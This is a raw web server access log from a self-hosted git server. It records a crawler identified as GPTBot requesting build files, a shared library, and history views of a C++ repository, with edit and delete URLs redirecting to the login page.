"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10653] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17255] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11236] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11330] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11322] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10108] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9875] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 965] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10555] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 27144] [Gzip 20.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10131] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 12141] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14424] [Gzip 5.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9880] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10121] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11308] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17274] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1497] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11360] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9908] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 1067] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10134] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11350] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 18157] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 1489] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:09:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:09:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:09:48 +0000] - 303 303 - GET 